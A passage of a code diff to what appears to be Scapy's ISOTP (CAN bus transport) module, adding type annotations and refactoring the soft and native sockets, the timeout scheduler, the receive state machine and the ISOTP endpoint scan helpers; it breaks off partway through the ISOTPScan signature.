identifier, ea, data): + # type: (int, Optional[int], bytes) -> bool if len(data) < 2: # At least 2 bytes are necessary: 1 for sequence number and # 1 for data @@ -510,21 +586,19 @@ def _feed_consecutive_frame(self, identifier, ea, data): return True def _feed_flow_control_frame(self, identifier, ea, data): + # type: (int, Optional[int], bytes) -> bool if len(data) < 3: # At least 2 bytes are necessary: 1 for sequence number and # 1 for data return False - keys = [self.last_ff, self.last_ff_ex] - if not any(keys): - return False - + keys = [x for x in (self.last_ff, self.last_ff_ex) if x is not None] buckets = [self.buckets.pop(k, None) for k in keys] self.last_ff = None self.last_ff_ex = None - if not any(buckets): + if not any(buckets) or not any(keys): # There is no message constructor waiting for this frame return False @@ -537,6 +611,7 @@ def _feed_flow_control_frame(self, identifier, ea, data): return True def _try_feed(self, identifier, ea, data, ts): + # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> None first_byte = six.indexbytes(data, 0) if len(data) > 1 and first_byte & 0xf0 == N_PCI_SF: self._feed_single_frame(identifier, ea, data, ts) @@ -552,30 +627,28 @@ class ISOTPSession(DefaultSession): """Defragment ISOTP packets 'on-the-flow'. Usage: - >>> sniff(session=ISOTPSession) + >>> sniff(session=ISOTPSession) """ def __init__(self, *args, **kwargs): - DefaultSession.__init__(self, *args, **kwargs) + # type: (Any, Any) -> None + super(ISOTPSession, self).__init__(*args, **kwargs) self.m = ISOTPMessageBuilder( use_ext_addr=kwargs.pop("use_ext_addr", None), did=kwargs.pop("did", None), - basecls=kwargs.pop("basecls", None)) + basecls=kwargs.pop("basecls", ISOTP)) def on_packet_received(self, pkt): + # type: (Optional[Packet]) -> None if not pkt: return - if isinstance(pkt, list): - for p in pkt: - ISOTPSession.on_packet_received(self, p) - return self.m.feed(pkt) while len(self.m) > 0: rcvd = self.m.pop() if self._supersession: self._supersession.on_packet_received(rcvd) else: - DefaultSession.on_packet_received(self, rcvd) + super(ISOTPSession, self).on_packet_received(rcvd) class ISOTPSoftSocket(SuperSocket): @@ -603,40 +676,54 @@ class ISOTPSoftSocket(SuperSocket): * Upon destruction, ISOTPSoftSocket.close() will be called * ISOTPSoftSocket.close() will call ISOTPSocketImplementation.close() * RX background thread can be stopped by the garbage collector - """ + + Initialize an ISOTPSoftSocket using the provided underlying can socket. + + Example (with NativeCANSocket underneath): + >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + >>> load_contrib('isotp') + >>> with ISOTPSocket("can0", sid=0x641, did=0x241) as sock: + >>> sock.send(...) + + Example (with PythonCANSocket underneath): + >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + >>> conf.contribs['CANSocket'] = {'use-python-can': True} + >>> load_contrib('isotp') + >>> with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: + >>> sock.send(...) + + :param can_socket: a CANSocket instance, preferably filtering only can + frames with identifier equal to did + :param sid: the CAN identifier of the sent CAN frames + :param did: the CAN identifier of the received CAN frames + :param extended_addr: the extended address of the sent ISOTP frames + (can be None) + :param extended_rx_addr: the extended address of the received ISOTP + frames (can be None) + :param rx_block_size: block size sent in Flow Control ISOTP frames + :param rx_separation_time_min: minimum desired separation time sent in + Flow Control ISOTP frames + :param padding: If True, pads sending packets with 0x00 which not + count to the payload. + Does not affect receiving packets. + :param basecls: base class of the packets emitted by this socket + """ # noqa: E501 nonblocking_socket = True def __init__(self, - can_socket=None, - sid=0, - did=0, - extended_addr=None, - extended_rx_addr=None, - rx_block_size=0, - rx_separation_time_min=0, - padding=False, - listen_only=False, - basecls=ISOTP): - """ - Initialize an ISOTPSoftSocket using the provided underlying can socket - - :param can_socket: a CANSocket instance, preferably filtering only can - frames with identifier equal to did - :param sid: the CAN identifier of the sent CAN frames - :param did: the CAN identifier of the received CAN frames - :param extended_addr: the extended address of the sent ISOTP frames - (can be None) - :param extended_rx_addr: the extended address of the received ISOTP - frames (can be None) - :param rx_block_size: block size sent in Flow Control ISOTP frames - :param rx_separation_time_min: minimum desired separation time sent in - Flow Control ISOTP frames - :param padding: If True, pads sending packets with 0x00 which not - count to the payload. - Does not affect receiving packets. - :param basecls: base class of the packets emitted by this socket - """ + can_socket=None, # type: Optional["CANSocket"] + sid=0, # type: int + did=0, # type: int + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + rx_block_size=0, # type: int + rx_separation_time_min=0, # type: int + padding=False, # type: bool + listen_only=False, # type: bool + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> None if six.PY3 and LINUX and isinstance(can_socket, six.string_types): from scapy.contrib.cansocket_native import NativeCANSocket @@ -661,42 +748,52 @@ def __init__(self, listen_only=listen_only ) - self.ins = impl - self.outs = impl + # Cast for compatibility to functions from SuperSocket. + self.ins = cast(socket.socket, impl) + self.outs = cast(socket.socket, impl) self.impl = impl - + self.basecls = basecls if basecls is None: warning('Provide a basecls ') - self.basecls = basecls def close(self): + # type: () -> None if not self.closed: self.impl.close() - self.outs = None - self.ins = None - SuperSocket.close(self) + self.closed = True def begin_send(self, p): + # type: (Packet) -> int """Begin the transmission of message p. This method returns after sending the first frame. If multiple frames are necessary to send the message, this socket will unable to send other messages until either the transmission of this frame succeeds or it fails.""" - if hasattr(p, "sent_time"): - p.sent_time = time.time() - return self.outs.begin_send(bytes(p)) + if not self.closed: + if hasattr(p, "sent_time"): + p.sent_time = time.time() + self.impl.begin_send(bytes(p)) + return len(p) + else: + return 0 def recv_raw(self, x=0xffff): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 """Receive a complete ISOTP message, blocking until a message is received or the specified timeout is reached. If self.timeout is 0, then this function doesn't block and returns the first frame in the receive buffer or None if there isn't any.""" - msg = self.ins.recv() - t = time.time() - return self.basecls, msg, t + if not self.closed: + tup = self.impl.recv() + if tup is not None: + return self.basecls, tup[0], float(tup[1]) + return self.basecls, None, None def recv(self, x=0xffff): - msg = SuperSocket.recv(self, x) + # type: (int) -> Optional[Packet] + msg = super(ISOTPSoftSocket, self).recv(x) + if msg is None: + return None if hasattr(msg, "src"): msg.src = self.src @@ -710,46 +807,48 @@ def recv(self, x=0xffff): @staticmethod def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] """This function is called during sendrecv() routine to wait for sockets to be ready to receive """ - blocking = remain is None or remain > 0 - def find_ready_sockets(): - return list(filter(lambda x: (x.ins is not None) and - (x.ins.rx_queue is not None) and - (not x.ins.rx_queue.empty()), - sockets)) + def find_ready_sockets(socks): + # type: (List[SuperSocket]) -> List[SuperSocket] + return [x for x in socks if isinstance(x, ISOTPSoftSocket) and + not x.closed and not x.impl.rx_queue.empty()] - ready_sockets = find_ready_sockets() + ready_sockets = find_ready_sockets(sockets) + + blocking = remain != 0 if len(ready_sockets) > 0 or not blocking: return ready_sockets exit_select = Event() def my_cb(msg): + # type: (Any) -> None exit_select.set() try: for s in sockets: - s.ins.rx_callbacks.append(my_cb) + if not s.closed and isinstance(s, ISOTPSoftSocket): + s.impl.rx_callbacks.append(my_cb) exit_select.wait(remain) finally: for s in sockets: - try: - s.ins.rx_callbacks.remove(my_cb) - except ValueError: - pass - except AttributeError: - pass + if isinstance(s, ISOTPSoftSocket): + try: + s.impl.rx_callbacks.remove(my_cb) + except (ValueError, AttributeError): + pass - ready_sockets = find_ready_sockets() + ready_sockets = find_ready_sockets(sockets) return ready_sockets -ISOTPSocket = ISOTPSoftSocket +ISOTPSocket = ISOTPSoftSocket # type: Union[Type[ISOTPSoftSocket], Type[ISOTPNativeSocket]] # noqa: E501 class CANReceiverThread(Thread): @@ -759,36 +858,39 @@ class CANReceiverThread(Thread): and not being lost if they come before the sniff method is called. This is true in general since sniff is usually implemented as repeated recv(), but might be false in some implementation of CANSocket + + Initialize the thread. In order for this thread to be able to be + stopped by the destructor of another object, it is important to not + keep a reference to the object in the callback function. + + :param socket: the CANSocket upon which this class will call the + sniff() method + :param callback: function to call whenever a CAN frame is received """ def __init__(self, can_socket, callback): - """ - Initialize the thread. In order for this thread to be able to be - stopped by the destructor of another object, it is important to not - keep a reference to the object in the callback function. - - :param socket: the CANSocket upon which this class will call the - sniff() method - :param callback: function to call whenever a CAN frame is received - """ + # type: ("CANSocket", Callable[[Packet], None]) -> None self.socket = can_socket self.callback = callback self.exiting = False self._thread_started = Event() - self.exception = None + self.exception = None # type: Optional[Exception] Thread.__init__(self) self.name = "CANReceiver" + self.name def start(self): + # type: () -> None Thread.start(self) if not self._thread_started.wait(5): raise Scapy_Exception("CAN RX thread not started in 5s.") def run(self): + # type: () -> None self._thread_started.set() try: def prn(msg): + # type: (Packet) -> None if not self.exiting: self.callback(msg) @@ -802,10 +904,11 @@ def prn(msg): raise ex if self.exiting: return - except Exception as ex: - self.exception = ex + except Exception as e: + self.exception = e def stop(self): + # type: () -> None self.exiting = True @@ -816,11 +919,14 @@ class TimeoutScheduler: GRACE = .1 _mutex = Lock() _event = Event() - _thread = None - _handles = [] # must use heapq functions! + _thread = None # type: Optional[Thread] + + # use heapq functions on _handles! + _handles = [] # type: List[TimeoutScheduler.Handle] @staticmethod def schedule(timeout, callback): + # type: (float, Callable[[], None]) -> TimeoutScheduler.Handle """Schedules the execution of a timeout. The function `callback` will be called in `timeout` seconds. @@ -856,6 +962,7 @@ def schedule(timeout, callback): @staticmethod def cancel(handle): + # type: (TimeoutScheduler.Handle) -> None """Provided its handle, cancels the execution of a timeout.""" handles = TimeoutScheduler._handles @@ -874,6 +981,7 @@ def cancel(handle): @staticmethod def clear(): + # type: () -> None """Cancels the execution of all timeouts.""" with TimeoutScheduler._mutex: TimeoutScheduler._handles.clear() @@ -883,6 +991,7 @@ def clear(): @staticmethod def _peek_next(): + # type: () -> Optional[TimeoutScheduler.Handle] """Returns the next timeout to execute, or `None` if list is empty, without modifying the list""" with TimeoutScheduler._mutex: @@ -894,6 +1003,7 @@ def _peek_next(): @staticmethod def _wait(handle): + # type: (Optional[TimeoutScheduler.Handle]) -> None """Waits until it is time to execute the provided handle, or until another thread calls _event.set()""" @@ -923,6 +1033,7 @@ def _wait(handle): @staticmethod def _task(): + # type: () -> None """Executed in a background thread, this thread will automatically start when the first timeout is added and stop when the last timeout is removed or executed.""" @@ -954,6 +1065,7 @@ def _task(): @staticmethod def _poll(): + # type: () -> None """Execute all the callbacks that were due until now""" handles = TimeoutScheduler._handles @@ -973,7 +1085,7 @@ def _poll(): handle._cb = True # Call the callback here, outside of the mutex - if callback is not None: + if callable(callback): try: callback() except Exception: @@ -981,6 +1093,7 @@ def _poll(): @staticmethod def _time(): + # type: () -> float if six.PY2: return time.time() return time.monotonic() @@ -988,13 +1101,18 @@ def _time(): class Handle: """Handle for a timeout, consisting of a callback and a time when it should be executed.""" - __slots__ = '_when', '_cb' + __slots__ = ['_when', '_cb'] - def __init__(self, when, cb): + def __init__(self, + when, # type: float + cb # type: Optional[Union[Callable[[], None], bool]] + ): + # type: (...) -> None self._when = when self._cb = cb def cancel(self): + # type: () -> bool """Cancels this timeout, preventing it from executing its callback""" if self._cb is None: @@ -1011,19 +1129,34 @@ def cancel(self): return True def __cmp__(self, other): + # type: (Any) -> int + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() diff = self._when - other._when return 0 if diff == 0 else (1 if diff > 0 else -1) def __lt__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() return self._when < other._when def __le__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() return self._when <= other._when def __gt__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() return self._when > other._when def __ge__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() return self._when >= other._when @@ -1052,43 +1185,43 @@ class ISOTPSocketImplementation(automaton.SelectableObject): This class is separated from ISOTPSoftSocket to make sure the background thread can't hold a reference to ISOTPSoftSocket, allowing it to be collected by the GC. + + :param can_socket: a CANSocket instance, preferably filtering only can + frames with identifier equal to did + :param src_id: the CAN identifier of the sent CAN frames + :param dst_id: the CAN identifier of the received CAN frames + :param padding: If True, pads sending packets with 0x00 which not + count to the payload. + Does not affect receiving packets. + :param extended_addr: Extended Address byte to be added at the + beginning of every CAN frame _sent_ by this object. Can be None + in order to disable extended addressing on sent frames. + :param extended_rx_addr: Extended Address byte expected to be found at + the beginning of every CAN frame _received_ by this object. Can + be None in order to disable extended addressing on received + frames. + :param rx_block_size: Block Size byte to be included in every Control + Flow Frame sent by this object. The default value of 0 means + that all the data will be received in a single block. + :param rx_separation_time_min: Time Minimum Separation byte to be + included in every Control Flow Frame sent by this object. The + default value of 0 indicates that the peer will not wait any + time between sending frames. + :param listen_only: Disables send of flow control frames """ def __init__(self, - can_socket, - src_id, - dst_id, - padding=False, - extended_addr=None, - extended_rx_addr=None, - rx_block_size=0, - rx_separation_time_min=0, - listen_only=False): - """ - :param can_socket: a CANSocket instance, preferably filtering only can - frames with identifier equal to did - :param src_id: the CAN identifier of the sent CAN frames - :param dst_id: the CAN identifier of the received CAN frames - :param padding: If True, pads sending packets with 0x00 which not - count to the payload. - Does not affect receiving packets. - :param extended_addr: Extended Address byte to be added at the - beginning of every CAN frame _sent_ by this object. Can be None - in order to disable extended addressing on sent frames. - :param extended_rx_addr: Extended Address byte expected to be found at - the beginning of every CAN frame _received_ by this object. Can - be None in order to disable extended addressing on received - frames. - :param rx_block_size: Block Size byte to be included in every Control - Flow Frame sent by this object. The default value of 0 means - that all the data will be received in a single block. - :param rx_separation_time_min: Time Minimum Separation byte to be - included in every Control Flow Frame sent by this object. The - default value of 0 indicates that the peer will not wait any - time between sending frames. - :param listen_only: Disables send of flow control frames - """ - + can_socket, # type: "CANSocket" + src_id, # type: int + dst_id, # type: int + padding=False, # type: bool + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + rx_block_size=0, # type: int + rx_separation_time_min=0, # type: int + listen_only=False # type: bool + ): + # type: (...) -> None automaton.SelectableObject.__init__(self) self.can_socket = can_socket @@ -1111,25 +1244,26 @@ def __init__(self, self.rx_queue = queue.Queue() self.rx_len = -1 - self.rx_buf = None + self.rx_buf = None # type: Optional[bytes] self.rx_sn = 0 self.rx_bs = 0 self.rx_idx = 0 + self.rx_ts = 0.0 # type: Union[float, EDecimal] self.rx_state = ISOTP_IDLE self.txfc_bs = 0 self.txfc_stmin = 0 self.tx_gap = 0 - self.tx_buf = None + self.tx_buf = None # type: Optional[bytes] self.tx_sn = 0 self.tx_bs = 0 self.tx_idx = 0 self.rx_ll_dl = 0 self.tx_state = ISOTP_IDLE - self.tx_timeout_handle = None - self.rx_timeout_handle = None + self.tx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 + self.rx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 self.rx_thread = CANReceiverThread(can_socket, self.on_can_recv) self.tx_mutex = Lock() @@ -1137,17 +1271,19 @@ def __init__(self, self.send_mutex = Lock() self.tx_done = Event() - self.tx_exception = None + self.tx_exception = None # type: Optional[str] - self.tx_callbacks = [] - self.rx_callbacks = [] + self.tx_callbacks = [] # type: List[Callable[[], None]] + self.rx_callbacks = [] # type: List[Callable[[bytes], None]] self.rx_thread.start() def __del__(self): + # type: () -> None self.close() def can_send(self, load): + # type: (bytes) -> None if self.padding: load += b"\xCC" * (CAN_MAX_DLEN - len(load)) if self.src_id is None or self.src_id <= 0x7ff: @@ -1157,6 +1293,7 @@ def can_send(self, load): data=load)) def on_can_recv(self, p): + # type: (Packet) -> None if not isinstance(p, CAN): raise Scapy_Exception("argument is not a CAN frame") if p.identifier != self.dst_id: @@ -1168,9 +1305,11 @@ def on_can_recv(self, p): self.on_recv(p) def close(self): + # type: () -> None self.rx_thread.stop() def _rx_timer_handler(self): + # type: () -> None """Method called every time the rx_timer times out, due to the peer not sending a consecutive frame within the expected time window""" @@ -1183,6 +1322,7 @@ def _rx_timer_handler(self): warning("RX state was reset due to timeout") def _tx_timer_handler(self): + # type: () -> None """Method called every time the tx_timer times out, which can happen in two situations: either a Flow Control frame was not received in time, or the Separation Time Min is expired and a new frame must be sent.""" @@ -1200,6 +1340,9 @@ def _tx_timer_handler(self): # push out the next segmented pdu src_off = len(self.ea_hdr) max_bytes = 7 - src_off + if self.tx_buf is None: + self.tx_exception = "TX buffer is not filled" + raise Scapy_Exception(self.tx_exception) while 1: load = self.ea_hdr @@ -1235,6 +1378,7 @@ def _tx_timer_handler(self): return def on_recv(self, cf): + # type: (Packet) -> None """Function that must be called every time a CAN frame is received, to advance the state machine.""" @@ -1258,19 +1402,20 @@ def on_recv(self, cf): self._recv_fc(data[ae:]) elif n_pci == N_PCI_SF: with self.rx_mutex: - self._recv_sf(data[ae:]) + self._recv_sf(data[ae:], cf.time) elif n_pci == N_PCI_FF: with self.rx_mutex: - self._recv_ff(data[ae:]) + self._recv_ff(data[ae:], cf.time) elif n_pci == N_PCI_CF: with self.rx_mutex: self._recv_cf(data[ae:]) def _recv_fc(self, data): + # type: (bytes) -> None """Process a received 'Flow Control' frame""" if (self.tx_state != ISOTP_WAIT_FC and self.tx_state != ISOTP_WAIT_FIRST_FC): - return 0 + return if self.tx_timeout_handle is not None: self.tx_timeout_handle.cancel() @@ -1326,9 +1471,8 @@ def _recv_fc(self, data): self.tx_done.set() raise Scapy_Exception(self.tx_exception) - return 0 - - def _recv_sf(self, data): + def _recv_sf(self, data, ts): + # type: (bytes, Union[float, EDecimal]) -> None """Process a received 'Single Frame' frame""" if self.rx_timeout_handle is not None: self.rx_timeout_handle.cancel() @@ -1341,16 +1485,16 @@ def _recv_sf(self, data): length = six.indexbytes(data, 0) & 0xf if len(data) - 1 < length: - return 1 + return msg = data[1:1 + length] - self.rx_queue.put(msg) + self.rx_queue.put((msg, ts)) for cb in self.rx_callbacks: cb(msg) self.call_release() - return 0 - def _recv_ff(self, data): + def _recv_ff(self, data, ts): + # type: (bytes, Union[float, EDecimal]) -> None """Process a received 'First Frame' frame""" if self.rx_timeout_handle is not None: self.rx_timeout_handle.cancel() @@ -1362,7 +1506,7 @@ def _recv_ff(self, data): self.rx_state = ISOTP_IDLE if len(data) < 7: - return 1 + return self.rx_ll_dl = len(data) # get the FF_DL @@ -1383,6 +1527,7 @@ def _recv_ff(self, data): data_bytes = data[ff_pci_sz:] self.rx_idx = len(data_bytes) self.rx_buf = data_bytes + self.rx_ts = ts # initial setup for this pdu reception self.rx_sn = 1 @@ -1400,12 +1545,11 @@ def _recv_ff(self, data): self.rx_timeout_handle = TimeoutScheduler.schedule( self.cf_timeout, self._rx_timer_handler) - return 0 - def _recv_cf(self, data): + # type: (bytes) -> None """Process a received 'Consecutive Frame' frame""" if self.rx_state != ISOTP_WAIT_DATA: - return 0 + return if self.rx_timeout_handle is not None: self.rx_timeout_handle.cancel() @@ -1413,7 +1557,7 @@ def _recv_cf(self, data): # CFs are never longer than the FF if len(data) > self.rx_ll_dl: - return 1 + return # CFs have usually the LL_DL length if len(data) < self.rx_ll_dl: @@ -1421,7 +1565,7 @@ def _recv_cf(self, data): if self.rx_len - self.rx_idx > self.rx_ll_dl: if conf.verb > 2: warning("Received a CF with insufficient length") - return 1 + return if six.indexbytes(data, 0) & 0x0f != self.rx_sn: # Wrong sequence number @@ -1429,7 +1573,10 @@ def _recv_cf(self, data): warning("RX state was reset because wrong sequence number was " "received") self.rx_state = ISOTP_IDLE - return 1 + return + + if self.rx_buf is None: + raise Scapy_Exception("rx_buf not filled with data!") self.rx_sn = (self.rx_sn + 1) % 16 self.rx_buf += data[1:] @@ -1439,12 +1586,12 @@ def _recv_cf(self, data): # we are done self.rx_buf = self.rx_buf[0:self.rx_len] self.rx_state = ISOTP_IDLE - self.rx_queue.put(self.rx_buf) + self.rx_queue.put((self.rx_buf, self.rx_ts)) for cb in self.rx_callbacks: cb(self.rx_buf) self.call_release() self.rx_buf = None - return 0 + return # perform blocksize handling, if enabled if self.rxfc_bs != 0: @@ -1461,9 +1608,9 @@ def _recv_cf(self, data): # wait for another CF self.rx_timeout_handle = TimeoutScheduler.schedule( self.cf_timeout, self._rx_timer_handler) - return 0 def begin_send(self, x): + # type: (bytes) -> None """Begins sending an ISOTP message. This method does not block.""" with self.tx_mutex: if self.tx_state != ISOTP_IDLE: @@ -1509,6 +1656,7 @@ def begin_send(self, x): self.fc_timeout, self._tx_timer_handler) def send(self, p): + # type: (bytes) -> None """Send an ISOTP frame and block until the message is sent or an error happens.""" with self.send_mutex: @@ -1523,6 +1671,7 @@ def send(self, p): return def recv(self, timeout=None): + # type: (Optional[int]) -> Optional[Tuple[bytes, Union[float, EDecimal]]] # noqa: E501 """Receive an ISOTP frame, blocking if none is available in the buffer for at most 'timeout' seconds.""" @@ -1532,6 +1681,7 @@ def recv(self, timeout=None): return None def check_recv(self): + # type: () -> bool """Implementation for SelectableObject""" return not self.rx_queue.empty() @@ -1622,6 +1772,7 @@ def __build_can_isotp_options( txpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, rxpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, rx_ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS): + # type: (int, int, int, int, int, int) -> bytes return struct.pack(self.can_isotp_options_fmt, flags, frame_txtime, @@ -1655,6 +1806,7 @@ def __build_can_isotp_fc_options(self, bs=CAN_ISOTP_DEFAULT_RECV_BS, stmin=CAN_ISOTP_DEFAULT_RECV_STMIN, wftmax=CAN_ISOTP_DEFAULT_RECV_WFTMAX): + # type: (int, int, int) -> bytes return struct.pack(self.can_isotp_fc_options_fmt, bs, stmin, @@ -1682,6 +1834,7 @@ def __build_can_isotp_ll_options(self, tx_dl=CAN_ISOTP_DEFAULT_LL_TX_DL, tx_flags=CAN_ISOTP_DEFAULT_LL_TX_FLAGS ): + # type: (int, int, int) -> bytes return struct.pack(self.can_isotp_ll_options_fmt, mtu, tx_dl, @@ -1707,6 +1860,7 @@ def __build_can_isotp_ll_options(self, # }; def __get_sock_ifreq(self, sock, iface): + # type: (socket.socket, str) -> IFREQ socket_id = ctypes.c_int(sock.fileno()) ifr = IFREQ() ifr.ifr_name = iface.encode('ascii') @@ -1719,6 +1873,7 @@ def __get_sock_ifreq(self, sock, iface): return ifr def __bind_socket(self, sock, iface, sid, did): + # type: (socket.socket, str, int, int) -> None socket_id = ctypes.c_int(sock.fileno()) ifr = self.__get_sock_ifreq(sock, iface) @@ -1739,11 +1894,15 @@ def __bind_socket(self, sock, iface, sid, did): if error < 0: warning("Couldn't bind socket") - def __set_option_flags(self, sock, extended_addr=None, - extended_rx_addr=None, - listen_only=False, - padding=False, - transmit_time=100): + def __set_option_flags(self, + sock, # type: socket.socket + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + listen_only=False, # type: bool + padding=False, # type: bool + transmit_time=100 # type: int + ): + # type: (...) -> None option_flags = CAN_ISOTP_DEFAULT_FLAGS if extended_addr is not None: option_flags = option_flags | CAN_ISOTP_EXTEND_ADDR @@ -1759,8 +1918,7 @@ def __set_option_flags(self, sock, extended_addr=None, option_flags = option_flags | CAN_ISOTP_LISTEN_MODE if padding: - option_flags = option_flags | CAN_ISOTP_TX_PADDING \ - | CAN_ISOTP_RX_PADDING + option_flags = option_flags | CAN_ISOTP_TX_PADDING | CAN_ISOTP_RX_PADDING # noqa: E501 sock.setsockopt(SOL_CAN_ISOTP, CAN_ISOTP_OPTS, @@ -1771,26 +1929,33 @@ def __set_option_flags(self, sock, extended_addr=None, rx_ext_address=extended_rx_addr)) def __init__(self, - iface=None, - sid=0, - did=0, - extended_addr=None, - extended_rx_addr=None, - listen_only=False, - padding=False, - transmit_time=100, - basecls=ISOTP): + iface=None, # type: Optional[Union[str, SuperSocket]] + sid=0, # type: int + did=0, # type: int + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + listen_only=False, # type: bool + padding=False, # type: bool + transmit_time=100, # type: int + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> None if not isinstance(iface, six.string_types): + # This is for interoperability with ISOTPSoftSockets. + # If a NativeCANSocket is provided, the interface name of this + # socket is extracted and an ISOTPNativeSocket will be opened + # on this interface. + iface = cast(SuperSocket, iface) if hasattr(iface, "ins") and hasattr(iface.ins, "getsockname"): iface = iface.ins.getsockname() if isinstance(iface, tuple): - iface = iface[0] + iface = cast(str, iface[0]) else: raise Scapy_Exception("Provide a string or a CANSocket " "object as iface parameter") - self.iface = iface or conf.contribs['NativeCANSocket']['iface'] + self.iface = cast(str, iface) or conf.contribs['NativeCANSocket']['iface'] # noqa: E501 self.can_socket = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, CAN_ISOTP) self.__set_option_flags(self.can_socket, @@ -1825,30 +1990,34 @@ def __init__(self, self.basecls = basecls def recv_raw(self, x=0xffff): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 """ Receives a packet, then returns a tuple containing (cls, pkt_data, time) - """ # noqa: E501 + """ try: pkt, _, ts = self._recv_raw(self.ins, x) except BlockingIOError: # noqa: F821 warning('Captured no data, socket in non-blocking mode.') - return None + return None, None, None except socket.timeout: warning('Captured no data, socket read timed out.') - return None + return None, None, None except OSError: # something bad happened (e.g. the interface went down) warning("Captured no data.") self.close() - return None + return None, None, None if ts is None: ts = get_last_packet_timestamp(self.ins) return self.basecls, pkt, ts def recv(self, x=0xffff): + # type: (int) -> Optional[Packet] msg = SuperSocket.recv(self, x) + if msg is None: + return msg if hasattr(msg, "src"): msg.src = self.src @@ -1860,10 +2029,10 @@ def recv(self, x=0xffff): msg.exdst = self.exdst return msg - __all__.append("ISOTPNativeSocket") if USE_CAN_ISOTP_KERNEL_MODULE: ISOTPSocket = ISOTPNativeSocket + __all__.append("ISOTPNativeSocket") # ################################################################### @@ -1942,7 +2111,8 @@ def filter_periodic_packets(packet_dict, verbose=False): if len(pkt_lst) < 3: continue - tg = [p1.time - p2.time for p1, p2 in zip(pkt_lst[1:], pkt_lst[:-1])] + tg = [float(p1.time) - float(p2.time) + for p1, p2 in zip(pkt_lst[1:], pkt_lst[:-1])] if all(abs(t1 - t2) < 0.001 for t1, t2 in zip(tg[1:], tg[:-1])): if verbose: print("[i] Identifier 0x%03x seems to be periodic. " @@ -1951,8 +2121,15 @@ def filter_periodic_packets(packet_dict, verbose=False): del packet_dict[k] -def get_isotp_fc(id_value, id_list, noise_ids, extended, packet, verbose=False): # noqa: E501 - # type: (int, Union[List[int], Dict[int, Tuple[Packet, int]]], Optional[Iterator[int]], bool, Packet, bool) -> None # noqa: E501 +def get_isotp_fc( + id_value, # type: int + id_list, # type: Union[List[int], Dict[int, Tuple[Packet, int]]] + noise_ids, # type: Optional[List[int]] + extended, # type: bool + packet, # type: Packet + verbose=False # type: bool +): + # type: (...) -> None """Callback for sniff function when packet received If received packet is a FlowControl and not in noise_ids append it @@ -1988,19 +2165,20 @@ def get_isotp_fc(id_value, id_list, noise_ids, extended, packet, verbose=False): else: raise TypeError("Unknown type of id_list") else: - noise_ids.append(packet.identifier) + if noise_ids is not None: + noise_ids.append(packet.identifier) except Exception as e: print("[!] Unknown message Exception: %s on packet: %s" % (e, repr(packet))) -def scan(sock, # type: SuperSocket - scan_range=range(0x800), # type: Iterator[int] - noise_ids=None, # type: Optional[Iterator[int]] - sniff_time=0.1, # type: float - extended_can_id=False, # type: bool - verbose=False # type: bool - ): # type: (...) -> Dict[int, Tuple[Packet, int]] # noqa: E501 +def scan(sock, # type: SuperSocket + scan_range=range(0x800), # type: Iterable[int] + noise_ids=None, # type: Optional[List[int]] + sniff_time=0.1, # type: float + extended_can_id=False, # type: bool + verbose=False # type: bool + ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan and return dictionary of detections ISOTP-Scan - NO extended IDs @@ -2016,7 +2194,7 @@ def scan(sock, # type: SuperSocket :param verbose: displays information during scan :return: Dictionary with all found packets """ - return_values = dict() + return_values = dict() # type: Dict[int, Tuple[Packet, int]] for value in scan_range: if noise_ids and value in noise_ids: continue @@ -2028,7 +2206,7 @@ def scan(sock, # type: SuperSocket started_callback=lambda: sock.send( get_isotp_packet(value, False, extended_can_id))) - cleaned_ret_val = dict() + cleaned_ret_val = dict() # type: Dict[int, Tuple[Packet, int]] for tested_id in return_values.keys(): for value in range(max(0, tested_id - 2), tested_id + 2, 1): @@ -2037,20 +2215,20 @@ def scan(sock, # type: SuperSocket verbose), timeout=sniff_time * 10, started_callback=lambda: sock.send( - get_isotp_packet(value, False, extended_can_id))) + get_isotp_packet(value, False, extended_can_id))) return cleaned_ret_val -def scan_extended(sock, # type: SuperSocket - scan_range=range(0x800), # type: Iterator[int] - scan_block_size=32, # type: int - extended_scan_range=range(0x100), # type: Iterator[int] - noise_ids=None, # type: Optional[Iterator[int]] # noqa: E501 - sniff_time=0.1, # type: float - extended_can_id=False, # type: bool - verbose=False # type: bool - ): # type: (...) -> Dict[int, Tuple[Packet, int]] # noqa: E501 +def scan_extended(sock, # type: SuperSocket + scan_range=range(0x800), # type: Iterable[int] + scan_block_size=32, # type: int + extended_scan_range=range(0x100), # type: Iterable[int] + noise_ids=None, # type: Optional[List[int]] + sniff_time=0.1, # type: float + extended_can_id=False, # type: bool + verbose=False # type: bool + ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan with ISOTP extended addresses and return dictionary of detections If an answer-packet found -> slow scan with @@ -2107,16 +2285,18 @@ def scan_extended(sock, # type: SuperSocket return return_values -def ISOTPScan(sock, - scan_range=range(0x7ff + 1), - extended_addressing=False, - extended_scan_range=range(0x100), - noise_listen_time=2, - sniff_time=0.1, - output_format=None, - can_interface=None, - 